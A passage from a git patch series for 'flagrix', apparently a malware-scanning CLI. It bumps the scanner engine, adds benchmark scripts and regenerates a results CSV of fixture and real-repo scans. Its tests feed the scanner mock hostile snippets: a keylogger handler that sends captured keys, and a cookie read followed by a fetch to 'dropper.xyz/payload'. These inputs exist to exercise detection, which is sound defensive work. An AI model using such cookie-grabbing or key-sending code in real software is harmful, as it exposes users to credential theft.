"https://registry.npmjs.org/@flagrix/scanner-core/-/scanner-core-0.1.3.tgz", - "integrity": "sha512-Ej90qcFpfnREH6PJ13s1jI1/ii3H3yCxlndEuNNzvE8iFqvx8L/aVKt1hx7L+U9n93lm7jFO95CCupPplH/iMQ==", + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/@flagrix/scanner-core/-/scanner-core-0.2.0.tgz", + "integrity": "sha512-aUvNIUhzdzRuwUfWCJ2ejI0eAugKiqKZ8g9v4DmxquU7LSv9nrJQ9+cZPKLaU5l/Z/OT4s4TjbJ7j3tD6APrIg==", "dev": true, "license": "MIT", "dependencies": { diff --git a/package.json b/package.json index 1cfbb8f..3f8c8e8 100644 --- a/package.json +++ b/package.json @@ -43,6 +43,8 @@ "test": "vitest run", "test:watch": "vitest", "typecheck": "tsc --noEmit", + "benchmark": "node benchmark/run.mjs", + "benchmark:pin": "node benchmark/pin-corpus.mjs", "sync-signatures": "node scripts/sync-signatures.mjs", "prepublishOnly": "npm run sync-signatures && npm run build && npm test" }, @@ -51,7 +53,7 @@ "zod": "^3.24.0" }, "devDependencies": { - "@flagrix/scanner-core": "^0.1.3", + "@flagrix/scanner-core": "^0.2.0", "@types/node": "^20.0.0", "tsup": "^8.0.0", "typescript": "^5.0.0", diff --git a/tests/scan.test.ts b/tests/scan.test.ts index f38a724..e71489d 100644 --- a/tests/scan.test.ts +++ b/tests/scan.test.ts @@ -83,7 +83,7 @@ describe("flagrix scan — exit codes and JSON", () => { it("critical finding → exit 3 (high)", async () => { global.fetch = mockApi({ - "src/t.js": `const c = document.cookie\ndocument.addEventListener("keydown", () => {})\n` + "src/t.js": `const c = document.cookie\ndocument.addEventListener("keydown", (e) => sendCapturedKey(e.key))\n` }) as unknown as typeof fetch const code = await runScan("acme/evil", { json: true }) expect(code).toBe(EXIT.HIGH) From 926ac92e680c2c91648947f69cc74600ce4c7254 Mon Sep 17 00:00:00 2001 From: Tomas Tilnak <14878713+tiltom@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:23:21 +0200 Subject: [PATCH 2/4] chore: prepare CLI 0.1.4 with scanner-core 0.3.0 --- package-lock.json | 12 ++++++------ package.json | 4 ++-- tests/scan.test.ts | 2 +- 3 files changed, 9 insertions(+), 9 deletions(-) diff --git a/package-lock.json b/package-lock.json index fba9d47..a2fe81b 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "flagrix", - "version": "0.1.3", + "version": "0.1.4", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "flagrix", - "version": "0.1.3", + "version": "0.1.4", "license": "MIT", "dependencies": { "@modelcontextprotocol/sdk": "^1.12.0", @@ -16,7 +16,7 @@ "flagrix": "dist/cli.js" }, "devDependencies": { - "@flagrix/scanner-core": "^0.2.0", + "@flagrix/scanner-core": "^0.3.0", "@types/node": "^20.0.0", "tsup": "^8.0.0", "typescript": "^5.0.0", @@ -469,9 +469,9 @@ } }, "node_modules/@flagrix/scanner-core": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/@flagrix/scanner-core/-/scanner-core-0.2.0.tgz", - "integrity": "sha512-aUvNIUhzdzRuwUfWCJ2ejI0eAugKiqKZ8g9v4DmxquU7LSv9nrJQ9+cZPKLaU5l/Z/OT4s4TjbJ7j3tD6APrIg==", + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/@flagrix/scanner-core/-/scanner-core-0.3.0.tgz", + "integrity": "sha512-TWTOX/XqeDb6OW0tsJsMLY4budwavAg6KXFNCpZkCmAWy9esv0epORRorRGrEV6pvg+796il/2aTPDNwBbkvFg==", "dev": true, "license": "MIT", "dependencies": { diff --git a/package.json b/package.json index 3f8c8e8..ebc3a6f 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "flagrix", - "version": "0.1.3", + "version": "0.1.4", "description": "Scan GitHub repos and profiles for malware before you clone — CLI and MCP server for the Flagrix scanner", "license": "MIT", "type": "module", @@ -53,7 +53,7 @@ "zod": "^3.24.0" }, "devDependencies": { - "@flagrix/scanner-core": "^0.2.0", + "@flagrix/scanner-core": "^0.3.0", "@types/node": "^20.0.0", "tsup": "^8.0.0", "typescript": "^5.0.0", diff --git a/tests/scan.test.ts b/tests/scan.test.ts index e71489d..f0811be 100644 --- a/tests/scan.test.ts +++ b/tests/scan.test.ts @@ -96,7 +96,7 @@ describe("flagrix scan — exit codes and JSON", () => { // Two independent high findings (0.25 + 0.25) land in the medium band // without any critical finding tripping the high floor. global.fetch = mockApi({ - "src/enc.js": `const c = document.cookie\nconst HOST = "203.0.113.42"\nfetch("http://" + HOST)\n` + "src/enc.js": `const c = document.cookie\nfetch("https://dropper.xyz/payload")\n` }) as unknown as typeof fetch const code = await runScan("acme/meh", { json: true }) expect(code).toBe(EXIT.MEDIUM) From 4bf50d01390fe9075eb87a25e5cba7687fd3b5df Mon Sep 17 00:00:00 2001 From: Tomas Tilnak <14878713+tiltom@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:40:59 +0200 Subject: [PATCH 3/4] fix: run benchmark against the installed engine and regenerate canonical results MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Review follow-ups (blocking): - run.mjs imports @flagrix/scanner-core from node_modules instead of the ../../flagrix-scanner-core sibling checkout — the benchmark now runs from a bare clone of this repo, and the devDependency pin actually governs the engine under test - metadata records the installed package version (0.3.0) and the snapshot rules version; sibling git sha/dirty fields are gone, so results can no longer be produced from an unpublished dirty working tree without saying so - post-fix-final regenerated against published scanner-core 0.3.0, rules snapshot 2026.07.12.003, CLI 0.1.4: 90/90 passed, all four gates green, both severe reference findings covered by reference-review.json --- benchmark/results/post-fix-final.csv | 182 +++++++++++++------------- benchmark/results/post-fix-final.json | 140 ++++++++++---------- benchmark/run.mjs | 35 ++--- 3 files changed, 171 insertions(+), 186 deletions(-) diff --git a/benchmark/results/post-fix-final.csv b/benchmark/results/post-fix-final.csv index f759237..062aa3d 100644 --- a/benchmark/results/post-fix-final.csv +++ b/benchmark/results/post-fix-final.csv @@ -1,91 +1,91 @@ -"sample_id","corpus","label","label_source","source_url","immutable_ref","expected_detection_category","minimum_expected_verdict","maximum_expected_verdict","status","test_passed","category_detected","verdict_pass","actual_verdict","actual_score","safe_to_clone","rules_triggered","finding_severities","finding_confidences","false_positive_notes","files_scanned","files_skipped","tree_truncated","duration_ms","engine_version","engine_commit_sha","detection_rules_version","detection_rules_commit_sha","error" -"critical-keylogger-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed behavior: keyboard capture plus network sink","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742","EXFIL_KEYLOGGER","high","","completed","true","true","true","high","0.4","false","EXFIL_KEYLOGGER","critical","high","","1","0","false","41","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-beavertail-loader-v1","critical-fixture","known-malicious-structure","Flagrix claimed Lazarus BeaverTail loader structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408","BEAVERTAIL_LOADER_V1","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_LOADER_V1","critical","high","","1","0","false","3","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-env-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed environment-variable exfiltration structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297","BEAVERTAIL_EXFIL","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_EXFIL","critical","high","","1","0","false","2","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-reverse-shell-v1","critical-fixture","known-malicious-structure","Flagrix claimed reverse-shell socket structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:feff0e223beffb7e78b88ad496ff6f96c1871028","REVERSE_SHELL","high","","completed","true","true","true","high","0.4","false","REVERSE_SHELL","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-crypto-miner-v1","critical-fixture","known-malicious-structure","Flagrix claimed cryptocurrency-miner endpoint structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943","CRYPTO_MINER","high","","completed","true","true","true","high","0.4","false","CRYPTO_MINER","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-obfuscated-eval-v1","critical-fixture","known-malicious-structure","Flagrix claimed Base64-decoded dynamic execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3","OBFUSCATED_EVAL","medium","","completed","true","true","true","high","0.4375","false","OBFUSCATED_EVAL | OBF_EVAL","critical | medium","high | low","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-rce-endpoint-v1","critical-fixture","known-malicious-structure","Flagrix claimed request-driven remote-code-execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca","BACKDOOR_RCE_ENDPOINT","high","","completed","true","true","true","high","0.4375","false","BACKDOOR_RCE_ENDPOINT | OBF_EVAL","critical | medium","high | low","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-credential-file-read-v1","critical-fixture","known-malicious-structure","Flagrix claimed credential-file access structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe","FILE_ACCESS_CREDENTIALS","high","","completed","true","true","true","high","0.4","false","FILE_ACCESS_CREDENTIALS","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-aws-key-v1","critical-fixture","known-malicious-structure","Flagrix claimed AWS access-key pattern using a reserved dummy value","https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html","fixture-v1:ab32de596974e481f402ba256ae69b9cf9ce9e76","HARDCODED_AWS_KEY","high","","completed","true","true","true","high","0.4","false","HARDCODED_AWS_KEY","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"critical-install-script-v1","critical-fixture","known-malicious-structure","Flagrix claimed install-time download and dynamic execution structure","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314","POSTINSTALL_SCRIPT","high","","completed","true","true","true","high","0.4","false","POSTINSTALL_SCRIPT","high | critical","unspecified | unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fixture-keyboard-shortcut-v1","reference-fixture","reference-clean","Regression control for ordinary keyboard UI handling","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fixture-placeholder-secret-v1","reference-fixture","reference-clean","Regression control for documented placeholder configuration","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7","","","low","completed","true","true","true","low","0.05","true","HARDCODED_API_KEY","low","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fixture-flask-debug-v1","reference-fixture","reference-clean","Regression control: deployment warning must not be labeled a backdoor","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26","","","low","completed","true","true","true","low","0.05","true","INSECURE_CONFIGURATION","low","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fixture-detector-regex-v1","reference-fixture","reference-clean","Regression control for security tools containing inert detector regexes","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fixture-event-stream-safe-version-v1","reference-fixture","reference-clean","Version-bound negative control for the compromised event-stream 3.3.6 incident","https://github.com/dominictarr/event-stream","package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-express","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/expressjs/express","ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4","","","low","completed","true","true","true","low","0","true","","","","","151","62","false","2991","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-fastify","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/fastify/fastify","de3752df84bb8dd35a8226bb467f05862f4da57c","","","low","completed","true","true","true","low","0.075","true","OBF_BASE64_HEAVY | DATA_EXFILTRATION","medium | medium","low | low","","200","193","false","3042","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-koa","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/koajs/koa","52d5e8ff5ac79f2479463b53df2999900ae95115","","","low","completed","true","true","true","low","0","true","","","","","84","27","false","2215","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-axios","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/axios/axios","3ebc76240c835a07fc6af23cb10d41579371a08f","","","low","completed","true","true","true","low","0.165","true","EXFIL_COOKIE | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium","medium | low | low","","200","254","false","4852","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-lodash","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/lodash/lodash","a666ba591064c8011988275790ad7d625279f09c","","","low","completed","true","true","true","low","0.2025","true","OBF_HEX_STRINGS | EXFIL_COOKIE | OBF_BASE64_HEAVY | OBF_EVAL | OBF_NEW_FUNCTION | OBFUSCATED_CODE | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | medium | low | low | low | low | low | low | low | low | low | low | low","","63","97","false","5500","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-chalk","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/chalk/chalk","aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","21","13","false","2281","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-uuid","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/uuidjs/uuid","ea83515d6a4de13a8f9d253fe772752c9dd7bbbe","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","100","34","false","2424","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-node-fetch","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/node-fetch/node-fetch","8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f","","","low","completed","true","true","true","low","0","true","","","","","27","26","false","1942","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-react","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/facebook/react","c0c39a6b3907eaab35f43074949e2957a2a734c1","","","low","completed","true","true","true","low","0.0375","true","NETWORK_COMMUNICATION","medium","low","","200","7070","false","4591","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-vue","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vuejs/core","9e03beb6b4c85a9d5b49b731c08263aa648e2a2a","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","503","false","2954","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-svelte","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/sveltejs/svelte","b4d1583ae20f3869a88a731d9a265c546c099f66","","","low","completed","true","true","true","low","0","true","","","","","200","8765","false","3229","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-vite","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vitejs/vite","fef682d3f067d534a559faf6fd9baedda2e9f8f1","","","low","completed","true","true","true","low","0","true","","","","","200","2513","false","3436","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-next","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vercel/next.js","93249ee06d6e0c105b1278412768c8e0816d9936","","","low","completed","true","true","true","low","0.27","true","OBF_BASE64_HEAVY | OBF_EVAL | OBFUSCATED_CODE | EXFIL_COOKIE | SUSPICIOUS_FILE_ACCESS | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | medium | medium | low | low | medium | medium | low | low | medium | low | medium | low | medium | low | medium | medium | medium | medium | low | low","","200","29628","false","10275","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-nest","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/nestjs/nest","f2938487c45db149964a8b0efc58a073610dcdf1","","","low","completed","true","true","true","low","0","true","","","","","200","1928","false","3363","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-vscode","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/vscode","af2c64423e7ee5d1030a000c82a0bb774d043351","","","low","completed","true","true","true","low","0.2625","true","OBF_BASE64_HEAVY | CREDENTIAL_THEFT | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | high | medium | medium | medium | medium | medium | medium","low | medium | low | low | low | low | low | low","Manual review required; this result is not yet classified as a false positive.","200","16247","false","4734","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-playwright","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/playwright","2670e5cae0239502d053e530da2c675e5aa536aa","","","low","completed","true","true","true","low","0.11249999999999999","true","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | low | low | low","","200","3047","false","3609","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-cypress","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/cypress-io/cypress","cd8bb88f1080d0ee354e605fadba986b03320828","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","200","6980","false","4145","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-electron","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/electron/electron","8215b5aa536ec6ae121003bc618bdd825bdbbb0f","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium | medium | medium","low | low | low","","200","2849","false","3442","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-esbuild","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/evanw/esbuild","6ff1d8b0d8c134e867a397eef39702a223ebef9e","","","low","completed","true","true","true","low","0.1275","true","SUSPICIOUS_FILE_ACCESS | DATA_EXFILTRATION","medium | medium","medium | low","","200","149","false","3536","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-node","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/nodejs/node","1314579f8c82ed70b8cbe736fdea1df48624c285","","","low","completed","true","true","true","low","0","true","","","","","200","49533","false","4251","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-hapijs-hapi","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/hapijs/hapi","d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc","","","low","completed","true","true","true","low","0","true","","","","","62","12","false","2921","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-reduxjs-redux","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux","5d65348e26635b6ec627b1030732ed38797e88e9","","","low","completed","true","true","true","low","0.1875","true","NETWORK_URL_SHORTENER | DATA_EXFILTRATION","medium | medium | medium | medium | medium","high | high | low | low | low","","200","276","false","3840","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-reduxjs-redux-toolkit","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux-toolkit","7b269256424e1d44baf83d7de634d9f53931dda7","","","low","completed","true","true","true","low","0","true","","","","","200","952","false","2662","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-immerjs-immer","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/immerjs/immer","60ca295e1185db80322ef55ec3fb8475cbc960c7","","","low","completed","true","true","true","low","0.15","true","NETWORK_URL_SHORTENER","medium","high","","60","105","false","3009","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-date-fns-date-fns","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/date-fns/date-fns","4098115cf705e3af7f663d8e5b0686e39a9f478a","","","low","completed","true","true","true","low","0.1275","true","OBF_EVAL | SUSPICIOUS_FILE_ACCESS","medium | medium | medium | medium | medium | medium | medium","low | low | low | low | low | low | medium","","200","1703","false","3523","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-ramda-ramda","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ramda/ramda","bcb320e60b5d91c958a6b02feb0bd8658d744298","","","low","completed","true","true","true","low","0.09","true","OBFUSCATED_CODE","medium","medium","","200","513","false","3255","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-sindresorhus-got","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/sindresorhus/got","e3924aa1e53a6ca3eb93a43618ce532442a89b40","","","low","completed","true","true","true","low","0","true","","","","","87","40","false","3360","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-socketio-socket-io","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/socketio/socket.io","d2d753fed4435015c2d83fe62e676b44e07fa3f7","","","low","completed","true","true","true","low","0.27749999999999997","true","NETWORK_URL_SHORTENER | BACKDOOR_HARDCODED_AUTH | HARDCODED_SECRETS","medium | medium | medium | medium | medium","high | high | low | low | medium","","200","655","false","3192","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-apollographql-apollo-client","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/apollographql/apollo-client","c843c98a803d7d7f48f4da72080a61d9086dc8ad","","","low","completed","true","true","true","low","0","true","","","","","200","853","false","3651","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-tanstack-query","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/TanStack/query","79d2384db5c8776680d5bfbe9b595618c066248b","","","low","completed","true","true","true","low","0.15","true","HARDCODED_API_KEY","high","medium","Manual review required; this result is not yet classified as a false positive.","200","2151","false","2969","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-testing-library-react-testing-library","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/testing-library/react-testing-library","be9d81d91314c9f0bafaa363f70b409b4b31989c","","","low","completed","true","true","true","low","0","true","","","","","36","31","false","2270","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-prisma-prisma","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prisma/prisma","cda80a4488b7b551c36bf09ca2e8303ef9509da4","","","low","completed","true","true","true","low","0.27749999999999997","true","TYPOSQUAT_PACKAGE | OBF_EVAL | HARDCODED_DB_CONNECTION","medium | medium | medium","unspecified | low | medium","","200","4471","false","3593","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-tailwindlabs-tailwindcss","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tailwindlabs/tailwindcss","35a3e9c5159bea77af0d48f0c8849279211cc7e9","","","low","completed","true","true","true","low","0","true","","","","","200","341","false","3046","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-prettier-prettier","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prettier/prettier","41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd","","","low","completed","true","true","true","low","0.0375","true","OBF_NEW_FUNCTION","medium | medium | medium","low | low | low","","200","9125","false","3497","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-eslint-eslint","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/eslint/eslint","c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31","","","low","completed","true","true","true","low","0.0375","true","DATA_EXFILTRATION","medium","low","","200","2156","false","3330","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"reference-pnpm-pnpm","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pnpm/pnpm","0dd21df7457d2026f411f2c1a09104280b9b16e5","","","low","completed","true","true","true","low","0.09","true","HARDCODED_SECRETS","medium","medium","","200","4869","false","3814","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" -"noisy-denoland-deno","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/denoland/deno","e5aed78415ded1213794bbf1ebbde1bf5cfa08b4","","","low","completed","true","true","true","low","0.2175","true","OBFUSCATED_CODE | OBF_BASE64_HEAVY | OBF_EVAL | HARDCODED_SECRETS | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | medium | medium | medium | medium | medium | medium | medium | medium","medium | low | low | low | medium | medium | low | low | low","","200","14300","false","5578","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" 